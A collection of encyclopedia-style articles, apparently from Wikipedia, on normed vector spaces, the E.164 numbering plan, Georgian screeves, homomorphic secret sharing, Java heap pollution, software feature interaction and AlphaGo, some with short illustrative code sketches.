Inmathematics, anormed vector spaceornormed spaceis avector spaceover therealorcomplexnumbers on which anormis defined.[1]A norm is a generalization of the intuitive notion of "length" in the physical world. IfV{\displaystyle V}is a vector space overK{\displaystyle K}, whereK{\displaystyle K}is a field equal toR{\displaystyle \mathbb {R} }or toC{\displaystyle \mathbb {C} }, then a norm onV{\displaystyle V}is a mapV→R{\displaystyle V\to \mathbb {R} }, typically denoted by‖⋅‖{\displaystyle \lVert \cdot \rVert }, satisfying the following four axioms:

1. Non-negativity: ‖x‖ ≥ 0 for every vectorx.
2. Positive definiteness: ‖x‖ = 0 if and only ifxis the zero vector.
3. Absolute homogeneity: ‖αx‖ = |α| ‖x‖ for every vectorxand every scalarα.
4. Triangle inequality: ‖x+y‖ ≤ ‖x‖ + ‖y‖ for all vectorsxandy.
IfV{\displaystyle V}is a real or complex vector space as above, and‖⋅‖{\displaystyle \lVert \cdot \rVert }is a norm onV{\displaystyle V}, then the ordered pair(V,‖⋅‖){\displaystyle (V,\lVert \cdot \rVert )}is called a normed vector space. If it is clear from context which norm is intended, then it is common to denote the normed vector space simply byV{\displaystyle V}.
A norm induces adistance, called its(norm) induced metric, by the formulad(x,y)=‖y−x‖.{\displaystyle d(x,y)=\|y-x\|.}which makes any normed vector space into ametric spaceand atopological vector space. If this metric space iscompletethen the normed space is aBanach space. Every normed vector space can be "uniquely extended" to a Banach space, which makes normed spaces intimately related to Banach spaces. Every Banach space is a normed space, but the converse is not true. For example, the set of thefinite sequencesof real numbers can be normed with theEuclidean norm, but it is not complete for this norm.
Aninner product spaceis a normed vector space whose norm is the square root of the inner product of a vector and itself. TheEuclidean normof aEuclidean vector spaceis a special case that allows definingEuclidean distanceby the formulad(A,B)=‖AB→‖.{\displaystyle d(A,B)=\|{\overrightarrow {AB}}\|.}
The study of normed spaces and Banach spaces is a fundamental part offunctional analysis, a major subfield of mathematics.
Anormed vector spaceis avector spaceequipped with anorm. Aseminormed vector spaceis a vector space equipped with aseminorm.
A usefulvariation of the triangle inequalityis‖x−y‖≥|‖x‖−‖y‖|{\displaystyle \|x-y\|\geq |\|x\|-\|y\||}for any vectorsx{\displaystyle x}andy.{\displaystyle y.}
This also shows that a vector norm is a (uniformly)continuous function.
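As an illustrative check (the helper names are ours, and the Euclidean norm is just one concrete example of a norm), the sketch below verifies the triangle inequality and the variation above on random vectors:

```python
import math
import random

def norm(v):
    """Euclidean norm on R^n -- one concrete example of a vector norm."""
    return math.sqrt(sum(x * x for x in v))

def satisfies_inequalities(u, v):
    """Check the triangle inequality and its reverse variation."""
    s = [a + b for a, b in zip(u, v)]
    d = [a - b for a, b in zip(u, v)]
    triangle = norm(s) <= norm(u) + norm(v) + 1e-12
    reverse = norm(d) >= abs(norm(u) - norm(v)) - 1e-12
    return triangle and reverse

random.seed(0)
ok = all(
    satisfies_inequalities(
        [random.uniform(-1, 1) for _ in range(3)],
        [random.uniform(-1, 1) for _ in range(3)],
    )
    for _ in range(1000)
)
```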
Property 3 depends on a choice of norm|α|{\displaystyle |\alpha |}on the field of scalars. When the scalar field isR{\displaystyle \mathbb {R} }(or more generally a subset ofC{\displaystyle \mathbb {C} }), this is usually taken to be the ordinaryabsolute value, but other choices are possible. For example, for a vector space overQ{\displaystyle \mathbb {Q} }one could take|α|{\displaystyle |\alpha |}to be thep{\displaystyle p}-adic absolute value.
If(V,‖⋅‖){\displaystyle (V,\|\,\cdot \,\|)}is a normed vector space, the norm‖⋅‖{\displaystyle \|\,\cdot \,\|}induces ametric(a notion ofdistance) and therefore atopologyonV.{\displaystyle V.}This metric is defined in the natural way: the distance between two vectorsu{\displaystyle \mathbf {u} }andv{\displaystyle \mathbf {v} }is given by‖u−v‖.{\displaystyle \|\mathbf {u} -\mathbf {v} \|.}This topology is precisely the weakest topology which makes‖⋅‖{\displaystyle \|\,\cdot \,\|}continuous and which is compatible with the linear structure ofV{\displaystyle V}in the following sense:
Similarly, for any seminormed vector space we can define the distance between two vectorsu{\displaystyle \mathbf {u} }andv{\displaystyle \mathbf {v} }as‖u−v‖.{\displaystyle \|\mathbf {u} -\mathbf {v} \|.}This turns the seminormed space into apseudometric space(notice this is weaker than a metric) and allows the definition of notions such ascontinuityandconvergence.
To put it more abstractly every seminormed vector space is atopological vector spaceand thus carries atopological structurewhich is induced by the semi-norm.
Of special interest arecompletenormed spaces, which are known asBanach spaces.
Every normed vector spaceV{\displaystyle V}sits as a dense subspace inside some Banach space; this Banach space is essentially uniquely defined byV{\displaystyle V}and is called thecompletionofV.{\displaystyle V.}
Two norms on the same vector space are calledequivalentif they define the sametopology. On a finite-dimensional vector space (but not on infinite-dimensional vector spaces), all norms are equivalent, although the resulting metric spaces need not be the same.[2]Since any Euclidean space is complete, it follows that all finite-dimensional normed vector spaces are Banach spaces.
A normed vector spaceV{\displaystyle V}islocally compactif and only if the unit ballB={x:‖x‖≤1}{\displaystyle B=\{x:\|x\|\leq 1\}}iscompact, which is the case if and only ifV{\displaystyle V}is finite-dimensional; this is a consequence ofRiesz's lemma. (In fact, a more general result is true: a topological vector space is locally compact if and only if it is finite-dimensional. The point here is that we don't assume the topology comes from a norm.)
The topology of a seminormed vector space has many nice properties. Given aneighbourhood systemN(0){\displaystyle {\mathcal {N}}(0)}around 0 we can construct all other neighbourhood systems asN(x)=x+N(0):={x+N:N∈N(0)}{\displaystyle {\mathcal {N}}(x)=x+{\mathcal {N}}(0):=\{x+N:N\in {\mathcal {N}}(0)\}}withx+N:={x+n:n∈N}.{\displaystyle x+N:=\{x+n:n\in N\}.}
Moreover, there exists aneighbourhood basisfor the origin consisting ofabsorbingandconvex sets. As this property is very useful infunctional analysis, generalizations of normed vector spaces with this property are studied under the namelocally convex spaces.
A norm (orseminorm)‖⋅‖{\displaystyle \|\cdot \|}on a topological vector space(X,τ){\displaystyle (X,\tau )}is continuous if and only if the topologyτ‖⋅‖{\displaystyle \tau _{\|\cdot \|}}that‖⋅‖{\displaystyle \|\cdot \|}induces onX{\displaystyle X}iscoarserthanτ{\displaystyle \tau }(meaning,τ‖⋅‖⊆τ{\displaystyle \tau _{\|\cdot \|}\subseteq \tau }), which happens if and only if there exists some open ballB{\displaystyle B}in(X,‖⋅‖){\displaystyle (X,\|\cdot \|)}(such as{x∈X:‖x‖<1}{\displaystyle \{x\in X:\|x\|<1\}}) that is open in(X,τ){\displaystyle (X,\tau )}(said differently, such thatB∈τ{\displaystyle B\in \tau }).
Atopological vector space(X,τ){\displaystyle (X,\tau )}is callednormableif there exists a norm‖⋅‖{\displaystyle \|\cdot \|}onX{\displaystyle X}such that the canonical metric(x,y)↦‖y−x‖{\displaystyle (x,y)\mapsto \|y-x\|}induces the topologyτ{\displaystyle \tau }onX.{\displaystyle X.}The following theorem is due toKolmogorov:[3]
Kolmogorov's normability criterion: A Hausdorff topological vector space is normable if and only if there exists a convex,von Neumann boundedneighborhood of0∈X.{\displaystyle 0\in X.}
A product of a family of normable spaces is normable if and only if only finitely many of the spaces are non-trivial (that is,≠{0}{\displaystyle \neq \{0\}}).[3]Furthermore, the quotient of a normable spaceX{\displaystyle X}by a closed vector subspaceC{\displaystyle C}is normable, and if in additionX{\displaystyle X}'s topology is given by a norm‖⋅‖{\displaystyle \|\,\cdot \,\|}then the mapX/C→R{\displaystyle X/C\to \mathbb {R} }given byx+C↦infc∈C‖x+c‖{\textstyle x+C\mapsto \inf _{c\in C}\|x+c\|}is a well-defined norm onX/C{\displaystyle X/C}that induces thequotient topologyonX/C.{\displaystyle X/C.}[4]
IfX{\displaystyle X}is a Hausdorfflocally convextopological vector spacethen the following are equivalent:
Furthermore,X{\displaystyle X}is finite-dimensional if and only ifXσ′{\displaystyle X_{\sigma }^{\prime }}is normable (hereXσ′{\displaystyle X_{\sigma }^{\prime }}denotesX′{\displaystyle X^{\prime }}endowed with theweak-* topology).
Even if a metrizable topological vector space has a topology that is defined by a family of norms, then it may nevertheless still fail to benormable space(meaning that its topology can not be defined by anysinglenorm).
An example of such a space is theFréchet spaceC∞(K),{\displaystyle C^{\infty }(K),}whose definition can be found in the article onspaces of test functions and distributions, because its topologyτ{\displaystyle \tau }is defined by a countable family of norms but it isnota normable space because there does not exist any norm‖⋅‖{\displaystyle \|\cdot \|}onC∞(K){\displaystyle C^{\infty }(K)}such that the topology this norm induces is equal toτ.{\displaystyle \tau .}In fact, the topology of alocally convex spaceX{\displaystyle X}can be defined by a family ofnormsonX{\displaystyle X}if and only if there existsat least onecontinuous norm onX.{\displaystyle X.}[6]
The most important maps between two normed vector spaces are thecontinuouslinear maps. Together with these maps, normed vector spaces form acategory.
The norm is a continuous function on its vector space. All linear maps between finite-dimensional vector spaces are also continuous.
Anisometrybetween two normed vector spaces is a linear mapf{\displaystyle f}which preserves the norm (meaning‖f(v)‖=‖v‖{\displaystyle \|f(\mathbf {v} )\|=\|\mathbf {v} \|}for all vectorsv{\displaystyle \mathbf {v} }). Isometries are always continuous andinjective. Asurjectiveisometry between the normed vector spacesV{\displaystyle V}andW{\displaystyle W}is called anisometric isomorphism, andV{\displaystyle V}andW{\displaystyle W}are calledisometrically isomorphic. Isometrically isomorphic normed vector spaces are identical for all practical purposes.
When speaking of normed vector spaces, we augment the notion ofdual spaceto take the norm into account. The dualV′{\displaystyle V^{\prime }}of a normed vector spaceV{\displaystyle V}is the space of allcontinuouslinear maps fromV{\displaystyle V}to the base field (the complexes or the reals) — such linear maps are called "functionals". The norm of a functionalφ{\displaystyle \varphi }is defined as thesupremumof|φ(v)|{\displaystyle |\varphi (\mathbf {v} )|}wherev{\displaystyle \mathbf {v} }ranges over all unit vectors (that is, vectors of norm1{\displaystyle 1}) inV.{\displaystyle V.}This turnsV′{\displaystyle V^{\prime }}into a normed vector space. An important theorem about continuous linear functionals on normed vector spaces is theHahn–Banach theorem.
The definition of many normed spaces (in particular,Banach spaces) involves a seminorm defined on a vector space and then the normed space is defined as thequotient spaceby the subspace of elements of seminorm zero. For instance, with theLp{\displaystyle L^{p}}spaces, the function defined by‖f‖p=(∫|f(x)|pdx)1/p{\displaystyle \|f\|_{p}=\left(\int |f(x)|^{p}\;dx\right)^{1/p}}is a seminorm on the vector space of all functions on which theLebesgue integralon the right hand side is defined and finite. However, the seminorm is equal to zero for any functionsupportedon a set ofLebesgue measurezero. These functions form a subspace which we "quotient out", making them equivalent to the zero function.
Givenn{\displaystyle n}seminormed spaces(Xi,qi){\displaystyle \left(X_{i},q_{i}\right)}with seminormsqi:Xi→R,{\displaystyle q_{i}:X_{i}\to \mathbb {R} ,}denote theproduct spacebyX:=∏i=1nXi{\displaystyle X:=\prod _{i=1}^{n}X_{i}}where vector addition defined as(x1,…,xn)+(y1,…,yn):=(x1+y1,…,xn+yn){\displaystyle \left(x_{1},\ldots ,x_{n}\right)+\left(y_{1},\ldots ,y_{n}\right):=\left(x_{1}+y_{1},\ldots ,x_{n}+y_{n}\right)}and scalar multiplication defined asα(x1,…,xn):=(αx1,…,αxn).{\displaystyle \alpha \left(x_{1},\ldots ,x_{n}\right):=\left(\alpha x_{1},\ldots ,\alpha x_{n}\right).}
Define a new functionq:X→R{\displaystyle q:X\to \mathbb {R} }byq(x1,…,xn):=∑i=1nqi(xi),{\displaystyle q\left(x_{1},\ldots ,x_{n}\right):=\sum _{i=1}^{n}q_{i}\left(x_{i}\right),}which is a seminorm onX.{\displaystyle X.}The functionq{\displaystyle q}is a norm if and only if allqi{\displaystyle q_{i}}are norms.
More generally, for each realp≥1{\displaystyle p\geq 1}the mapq:X→R{\displaystyle q:X\to \mathbb {R} }defined byq(x1,…,xn):=(∑i=1nqi(xi)p)1p{\displaystyle q\left(x_{1},\ldots ,x_{n}\right):=\left(\sum _{i=1}^{n}q_{i}\left(x_{i}\right)^{p}\right)^{\frac {1}{p}}}is a seminorm.
For each suchp{\displaystyle p}, the resulting seminorm induces the same topology onX.{\displaystyle X.}
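For illustration, here is a sketch (with hypothetical helper names) using the absolute value as the coordinate seminorm on the reals, so the combined map is in fact a norm on the product:

```python
def product_p_seminorm(seminorms, xs, p=1.0):
    """Combine coordinate seminorms q_i into a seminorm q on the product."""
    return sum(q(x) ** p for q, x in zip(seminorms, xs)) ** (1.0 / p)

# |.| is a norm on R, so the combined map is a norm on R^2.
x = (3.0, 4.0)
q1 = product_p_seminorm([abs, abs], x, p=1)  # taxicab-style combination
q2 = product_p_seminorm([abs, abs], x, p=2)  # Euclidean-style combination
# The standard bounds q2 <= q1 <= sqrt(2) * q2 witness that both
# combinations induce the same topology on the product.
```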
A straightforward argument involving elementary linear algebra shows that the only finite-dimensional seminormed spaces are those arising as the product space of a normed space and a space with trivial seminorm. Consequently, many of the more interesting examples and applications of seminormed spaces occur for infinite-dimensional vector spaces.
|
https://en.wikipedia.org/wiki/Normed_space
|
E.164is aninternational standard(ITU-TRecommendation), titledThe international public telecommunication numbering plan, that defines anumbering planfor the worldwidepublic switched telephone network(PSTN) and some other datanetworks.
E.164 defines a general format for internationaltelephone numbers. Plan-conforming telephone numbers are limited to only digits and to a maximum of fifteen digits.[1]The specification divides the digit string into a country code of one to three digits, and the subscriber telephone number of a maximum of twelve digits.
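A common way to check these limits in software is a regular expression over the globalized form. This is a sketch, not part of the recommendation itself (E.164 defines the digit limits, not this regex or the leading plus sign):

```python
import re

# Globalized form: '+', a first digit 1-9, and at most fifteen digits total.
E164_PATTERN = re.compile(r"\+[1-9]\d{1,14}")

def is_e164(number: str) -> bool:
    """Return True if `number` looks like a globalized E.164 number."""
    return E164_PATTERN.fullmatch(number) is not None
```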
Recommendation E.164 is part of a series of standards (E.160–E.169,Numbering plan of the international telephone service) that represent a redefinition of the earlier specifications in Recommendation E.29 in the Red Books of 1960 and 1964. In 1960, an international numbering plan was defined for Europe and parts of western Asia, and some Mediterranean countries.[2]In 1964, E.29 was expanded with a global code system based onworld numbering zones. In the 1968 White Book, the definition of country codes was relegated to ITU Recommendation E.161. The first issue of E.164 was published in 1988 in Blue Book Fascicle II.2, under the titleNumbering Plan for the ISDN Era.
E.163 was the formerITU-Trecommendation for describingtelephonenumbers for thepublic switched telephone network(PSTN). In the United States, this was formerly referred to as adirectory number. E.163 was withdrawn, and some recommendations were incorporated into revision 1 of E.164 in 1997.[3]
This recommendation describes the procedures and criteria for the reservation, assignment, and reclamation of E.164 country codes and associatedidentification code(IC) assignments.[4]The criteria and procedures are provided as a basis for the effective and efficient utilization of the available E.164 numbering resources.
This recommendation contains the criteria and procedures for an applicant to be temporarily assigned a three-digit identification code within the shared E.164 country code991for the purpose of conducting an international non-commercial trial.[5]
This recommendation describes the principles, criteria, and procedures for the assignment and reclamation of resources within a shared E.164 country code for groups of countries.[6]These shared country codes will coexist with all other E.164-based country codes assigned by the ITU. The resource of the shared country code consists of acountry codeand agroup identification code(CC + GIC) and provides the capability for a group of countries to provide telecommunication services within the group. The Telecommunication Standardization Bureau (TSB), the secretariat of the ITU Telecommunication Standardization Sector (ITU-T), is responsible for the assignment of the CC + GIC.
The E.164 recommendation provides the telephone number structure and functionality for five categories of telephone numbers used in international publictelecommunications.
For each of the categories, it details the components of the numbering structure and the digit analysis required for successfulroutingof calls. Annex A provides additional information on the structure and function of E.164 numbers. Annex B provides information on network identification, service parameters, calling/connected line identity, dialing procedures, and addressing for Geographic-basedISDNcalls. Specific E.164-based applications which differ in usage are defined in separate recommendations.
The number categories are all based on a fifteen-digit numbering space. Before 1997, only twelve digits were allowed. The definition does not include anyinternational call prefixes, necessary for a call to reach international circuits from inside the country of call origination.
(See Figure 2 in [1].)
E.164 numbers were originally defined for use in the worldwidepublic switched telephone network(PSTN). The early PSTN collected routing digits from users (e.g. on a dial pad), signaled those digits to each telephony switch, and used the numbers to determine how to ultimately reach the called party.
ITU-TE.123entitledNotation for national and international telephone numbers, e-mail addresses and web addressesprovides guidance when printing E.164 telephone numbers. This format includes the recommendation of prefixing international telephone numbers with a plus sign (+) and using only spaces for digit grouping.
The presentation of a telephone number with the plus sign (+) indicates that the number should be dialed with aninternational calling prefix, in place of the plus sign. The number is presented starting with thetelephone country code. This is called theglobalizedformat of an E.164 number, and is defined in the Internet Engineering Task ForceRFC2806.[7]The international calling prefix is atrunk codeto reach an international circuit in the country of call origination.[8]
Some national telephone administrations and telephone companies have implemented anInternet-based database for their numbering spaces. E.164 numbers may be registered in theDomain Name System(DNS) of theInternetin which the second-level domain e164.arpa has been reserved fortelephone number mapping(ENUM). In the system, any telephone number may be mapped into adomain nameusing a reverse sequence of subdomains for each digit. For example, the telephone number+19995550123translates to the domain name3.2.1.0.5.5.5.9.9.9.1.e164.arpa. When a number is mapped, a DNS query may be used to locate the service facilities on the Internet that accept and process telephone calls to the owner of record of the number, using, for example, theSession Initiation Protocol(SIP), a call-signalingVoIPprotocol whoseSIP addressesare similar in format (user@domain...) to e-mail addresses. This allows a direct, end-to-end Internet connection without passing through the public switched telephone network.
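The digit-reversal mapping described above can be sketched as follows (the helper name is illustrative):

```python
def enum_domain(number: str) -> str:
    """Map a globalized E.164 number to its ENUM domain under e164.arpa:
    drop the '+', reverse the digits, and separate them with dots."""
    digits = number.lstrip("+")
    return ".".join(reversed(digits)) + ".e164.arpa"

# For example, +19995550123 maps to 3.2.1.0.5.5.5.9.9.9.1.e164.arpa.
```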
|
https://en.wikipedia.org/wiki/E.164
|
Screeveis a term of grammatical description in traditional Georgian grammars that roughly corresponds totense–aspect–moodmarking in the Western grammatical tradition. It derives from theGeorgianwordმწკრივიmts’k’rivi'row'. Formally, it refers to a set of six verb forms inflected for person and number forming a single paradigm. For example, theaoristscreeve for most verbal forms consists of at least a preverb (და-da-'PFV'), a root (წერts’er'write'), and a screeve ending (-ე-e,-ა-a,-ეს-es), and in the first and second persons a plural suffix (-თ-t) to form the inflection (დაწერეთdats’eret):
დავწერე davts’ere 'I wrote it'
დავწერეთ davts’eret 'We wrote it'
დაწერე dats’ere 'You (singular) wrote it'
დაწერეთ dats’eret 'You (plural) wrote it'
დაწერა dats’era 'He/she wrote it'
დაწერეს dats’eres 'They wrote it'
Similar constructions exist in Western grammars, but screeves differ from them in significant ways. In many Western languages, endings encode all of tense, aspect and mood, but in Georgian, the screeve endings may or may not include one of these categories. For example, the perfect series screeves have modal and evidential properties that are completely absent in theaoristand present/future series screeves, such thatწერილი დაუწერიაts’erili dauts’eria'He has apparently written the letter'implies that the speaker knows the letter is written because (for example) they have seen the finished letter sitting on a table. However, the present formწერილს დაწერსts’erils dats’ers'He will write the letter'is simply neutral with respect to the question of how the speaker knows (or does not know) that the letter will be written.
|
https://en.wikipedia.org/wiki/Screeve
|
In cryptography, homomorphic secret sharing is a type of secret sharing algorithm in which the secret is encrypted via homomorphic encryption. A homomorphism is a transformation from one algebraic structure into another of the same type so that the structure is preserved. Importantly, this means that for every kind of manipulation of the original data, there is a corresponding manipulation of the transformed data.[1]
Homomorphic secret sharing can be used to transmit a secret to several recipients, as the following example illustrates.
Suppose a community wants to hold an election using a decentralized voting protocol, but wants to ensure that the vote-counters will not lie about the results. Using a type of homomorphic secret sharing known as Shamir's secret sharing, each member of the community can add their vote to a form that is split into pieces; each piece is then submitted to a different vote-counter. The pieces are designed so that the vote-counters cannot predict how any alteration to a piece will affect the whole, thus discouraging vote-counters from tampering with their pieces. When all votes have been received, the vote-counters combine the pieces, allowing them to recover the aggregate election results.
In detail, suppose the election has two possible outcomes and k tallying authorities. Each voter encodes their ballot as the constant term of a random polynomial P(x) of degree t and submits the share P(i) to authority i.
This protocol works as long as not all of thekauthorities are corrupt — if they were, then they could collaborate to reconstructP(x) for each voter and also subsequently alter the votes.
The protocol requires t + 1 authorities to complete; therefore, if there are N > t + 1 authorities, N − t − 1 authorities can be corrupted, which gives the protocol a certain degree of robustness.
The protocol manages the IDs of the voters (the IDs were submitted with the ballots) and therefore can verify that only legitimate voters have voted.
Under the assumptions on t, the protocol implicitly prevents corruption of ballots: each authority holds only a share of each ballot and has no knowledge of how changing that share would affect the outcome, so the authorities have no incentive to alter their shares.
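The additive homomorphism of Shamir shares is what lets the authorities tally without seeing individual votes: summing each authority's shares yields a valid sharing of the summed ballots. A small sketch under stated assumptions (yes/no ballots encoded as 0 or 1, a fixed small prime modulus, and purely illustrative class and method names):

```java
import java.math.BigInteger;
import java.security.SecureRandom;
import java.util.Arrays;

public class ShamirVote {
    static final BigInteger P = BigInteger.valueOf(2147483647L); // prime modulus (illustrative)

    // Split a vote into n shares with threshold t+1, via a random
    // degree-t polynomial whose constant term is the vote.
    static BigInteger[] share(long vote, int n, int t, SecureRandom rnd) {
        BigInteger[] coeff = new BigInteger[t + 1];
        coeff[0] = BigInteger.valueOf(vote);
        for (int j = 1; j <= t; j++) coeff[j] = new BigInteger(P.bitLength() - 1, rnd);
        BigInteger[] shares = new BigInteger[n];
        for (int i = 1; i <= n; i++) {
            BigInteger x = BigInteger.valueOf(i), y = BigInteger.ZERO;
            for (int j = t; j >= 0; j--) y = y.multiply(x).add(coeff[j]).mod(P); // Horner
            shares[i - 1] = y;
        }
        return shares;
    }

    // Recover the constant term from the shares at x = 1..t+1 by
    // Lagrange interpolation evaluated at x = 0.
    static BigInteger reconstruct(BigInteger[] shares, int t) {
        BigInteger secret = BigInteger.ZERO;
        for (int i = 1; i <= t + 1; i++) {
            BigInteger num = BigInteger.ONE, den = BigInteger.ONE;
            for (int j = 1; j <= t + 1; j++) {
                if (j == i) continue;
                num = num.multiply(BigInteger.valueOf(-j)).mod(P);
                den = den.multiply(BigInteger.valueOf(i - j)).mod(P);
            }
            BigInteger li = num.multiply(den.modInverse(P)).mod(P);
            secret = secret.add(shares[i - 1].multiply(li)).mod(P);
        }
        return secret;
    }

    public static void main(String[] args) {
        SecureRandom rnd = new SecureRandom();
        int n = 5, t = 2;                       // 5 authorities, threshold t+1 = 3
        long[] votes = {1, 0, 1, 1};            // four yes/no ballots (made up)
        BigInteger[] tally = new BigInteger[n]; // each authority sums the shares it receives
        Arrays.fill(tally, BigInteger.ZERO);
        for (long v : votes) {
            BigInteger[] s = share(v, n, t, rnd);
            for (int i = 0; i < n; i++) tally[i] = tally[i].add(s[i]).mod(P);
        }
        // Any t+1 authorities reconstruct the aggregate, never an individual vote.
        System.out.println(reconstruct(tally, t)); // prints 3
    }
}
```

No single authority's tally share reveals anything about an individual ballot; only the combined interpolation at x = 0 exposes the aggregate count.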
|
https://en.wikipedia.org/wiki/Homomorphic_secret_sharing
|
In the Java programming language, heap pollution is a situation that arises when a variable of a parameterized type refers to an object that is not of that parameterized type.[1] This situation is normally detected during compilation and indicated with an unchecked warning.[1] Later, during runtime, heap pollution will often cause a ClassCastException.[2]
Heap pollution in Java can occur because type arguments and variables are not reified at run-time. As a result, different parameterized types are implemented by the same class or interface at run time. All invocations of a given generic type declaration share a single run-time implementation. This results in the possibility of heap pollution.[2]
Under certain conditions, a variable of a parameterized type may refer to an object that is not of that parameterized type. The variable will always refer to an object that is an instance of a class that implements the parameterized type.
Heap pollution in a non-varargs context
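A minimal sketch of the non-varargs case (class and method names are illustrative). The raw-type assignment and unchecked cast compile with warnings only; the ClassCastException surfaces later, when the polluted element is read back through the parameterized variable:

```java
import java.util.ArrayList;
import java.util.List;

public class HeapPollutionDemo {
    // A raw-type reference lets a list of Strings be viewed as a
    // List<Integer>; the unchecked cast pollutes the heap.
    @SuppressWarnings("unchecked")
    static List<Integer> pollute() {
        List raw = new ArrayList<String>();
        raw.add("not an integer");      // legal through the raw reference
        return (List<Integer>) raw;     // unchecked cast: heap pollution
    }

    public static void main(String[] args) {
        List<Integer> nums = pollute(); // no error yet: types are erased
        try {
            Integer n = nums.get(0);    // compiler-inserted cast fails here
            System.out.println(n);
        } catch (ClassCastException e) {
            System.out.println("caught ClassCastException");
        }
    }
}
```

Note that the failure point is far from the cause: `pollute()` succeeds silently, and the exception appears only at the first read, which is what makes heap pollution hard to debug.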
|
https://en.wikipedia.org/wiki/Heap_pollution
|
Feature interaction is a software engineering concept. It occurs when the integration of two features would modify the behavior of one or both features.
The term feature is used to denote a unit of functionality of a software application. As with many concepts in computer science, the term can be used at different levels of abstraction. For example, the plain old telephone service (POTS) is a telephony application feature at one level, but is itself composed of originating features and terminating features. The originating features may in turn include the provide-dial-tone feature, the digit-collection feature, and so on.
This definition of feature interaction allows one to focus on certain behavior of the interacting features, such as how their response time may be changed given the integration. Many researchers in the field consider problems that arise due to changes in the execution behavior of the interacting features. In that context, the behavior of a feature is defined by its execution flow and output for a given input. In other words, the interaction changes the execution flow and output of the interacting features for a given input.
In the context of telephony, a telephone line (the system) typically offers a set of features that include call forwarding and call waiting. Call waiting allows one call to be suspended while a second call is answered, while call forwarding enables a customer to specify a secondary phone number to which additional calls will be forwarded in the event that the customer is already using the phone.
To illustrate the example, we consider a telephone line provided to a customer, and we assume that both call forwarding and call waiting are enabled on the line. When a first call arrives on the line, the phone rings and is answered. Since neither feature is activated by the first call, there is no noticeable problem. When a second call arrives before the first has terminated, the telephone system has a decision to make: whether the call should be forwarded to the secondary number (call forwarding) or the person who answered the first call should be notified that another call has arrived (call waiting). Since this decision has no obvious correct answer, the optimal answer depends on the needs of the customer. This feature interaction is a specific example of a general and common problem that has become prevalent due to increasing system complexity.
In this situation, it is possible that the system’s decision will be made in a non-deterministic fashion due to race conditions and other design factors. The consequences of feature interactions can range from minor irritations to life-threatening software failures, and therefore there is ongoing research that aims to find ways of detecting as well as resolving feature interactions.
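The call-waiting/call-forwarding conflict can be sketched as two feature handlers that each claim the same "line busy" event. All names here are illustrative; the point is only that each feature is correct in isolation, yet the system's behavior depends on an arbitrary ordering:

```java
import java.util.List;
import java.util.Optional;
import java.util.function.Function;

public class FeatureInteractionDemo {
    record Call(boolean lineBusy) {}

    // Each feature inspects an incoming call and may claim it with an action.
    interface Feature extends Function<Call, Optional<String>> {}

    static final Feature CALL_WAITING =
        c -> c.lineBusy() ? Optional.of("play waiting tone") : Optional.empty();
    static final Feature CALL_FORWARDING =
        c -> c.lineBusy() ? Optional.of("forward to secondary number") : Optional.empty();

    // First feature to claim the call wins, so the outcome depends on
    // registration order: the feature interaction problem in miniature.
    static String dispatch(List<Feature> features, Call call) {
        for (Feature f : features) {
            Optional<String> action = f.apply(call);
            if (action.isPresent()) return action.get();
        }
        return "ring";
    }

    public static void main(String[] args) {
        Call busy = new Call(true);
        // Each ordering is sensible in isolation, yet the two disagree:
        System.out.println(dispatch(List.of(CALL_WAITING, CALL_FORWARDING), busy));
        // prints "play waiting tone"
        System.out.println(dispatch(List.of(CALL_FORWARDING, CALL_WAITING), busy));
        // prints "forward to secondary number"
    }
}
```

Neither ordering is wrong by the features' own specifications, which is why resolution policies (priorities, customer preferences) rather than bug fixes are the usual remedy.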
|
https://en.wikipedia.org/wiki/Feature_interaction_problem
|
AlphaGo is a computer program that plays the board game Go.[1] It was developed by the London-based DeepMind Technologies,[2] an acquired subsidiary of Google. Subsequent versions of AlphaGo became increasingly powerful, including a version that competed under the name Master.[3] After retiring from competitive play, AlphaGo Master was succeeded by an even more powerful version known as AlphaGo Zero, which was completely self-taught without learning from human games. AlphaGo Zero was then generalized into a program known as AlphaZero, which played additional games, including chess and shogi. AlphaZero has in turn been succeeded by a program known as MuZero, which learns without being taught the rules.
AlphaGo and its successors use a Monte Carlo tree search algorithm to find their moves, guided by knowledge previously acquired by machine learning, specifically by an artificial neural network (a deep learning method) trained extensively on both human and computer play.[4] A neural network is trained to identify the best moves and the winning percentages of these moves. This neural network improves the strength of the tree search, resulting in stronger move selection in the next iteration.
In October 2015, in a match against Fan Hui, the original AlphaGo became the first computer Go program to beat a human professional Go player without handicap on a full-sized 19×19 board.[5][6] In March 2016, it beat Lee Sedol in a five-game match, the first time a computer Go program had beaten a 9-dan professional without handicap.[7] Although AlphaGo lost the fourth game to Lee Sedol, Lee resigned the final game, giving a final score of 4 games to 1 in favour of AlphaGo. In recognition of the victory, AlphaGo was awarded an honorary 9-dan by the Korea Baduk Association.[8] The lead-up and the challenge match with Lee Sedol were documented in a documentary film, also titled AlphaGo,[9] directed by Greg Kohs. The win by AlphaGo was chosen by Science as one of the Breakthrough of the Year runners-up on 22 December 2016.[10]
At the 2017 Future of Go Summit, the Master version of AlphaGo beat Ke Jie, the number-one-ranked player in the world at the time, in a three-game match, after which AlphaGo was awarded professional 9-dan by the Chinese Weiqi Association.[11]
After the match between AlphaGo and Ke Jie, DeepMind retired AlphaGo, while continuing AI research in other areas.[12] The self-taught AlphaGo Zero achieved a 100–0 victory against the early competitive version of AlphaGo, and its successor AlphaZero was perceived as the world's top player in Go by the end of the 2010s.[13][14]
Go is considered much more difficult for computers to win than other games such as chess, because its strategic and aesthetic nature makes it hard to directly construct an evaluation function, and its much larger branching factor makes it prohibitively difficult to use traditional AI methods such as alpha–beta pruning, tree traversal and heuristic search.[5][15]
Almost two decades after IBM's computer Deep Blue beat world chess champion Garry Kasparov in their 1997 match, the strongest Go programs using artificial intelligence techniques had reached only about amateur 5-dan level,[4] and still could not beat a professional Go player without a handicap.[5][6][16] In 2012, the software program Zen, running on a four-PC cluster, beat Masaki Takemiya (9p) twice at five- and four-stone handicaps.[17] In 2013, Crazy Stone beat Yoshio Ishida (9p) at a four-stone handicap.[18]
According to DeepMind's David Silver, the AlphaGo research project was formed around 2014 to test how well a neural network using deep learning can compete at Go.[19] AlphaGo represents a significant improvement over previous Go programs. In 500 games against other available Go programs, including Crazy Stone and Zen, AlphaGo running on a single computer won all but one.[20] In a similar matchup, AlphaGo running on multiple computers won all 500 games played against other Go programs, and 77% of games played against AlphaGo running on a single computer. The distributed version in October 2015 was using 1,202 CPUs and 176 GPUs.[4]
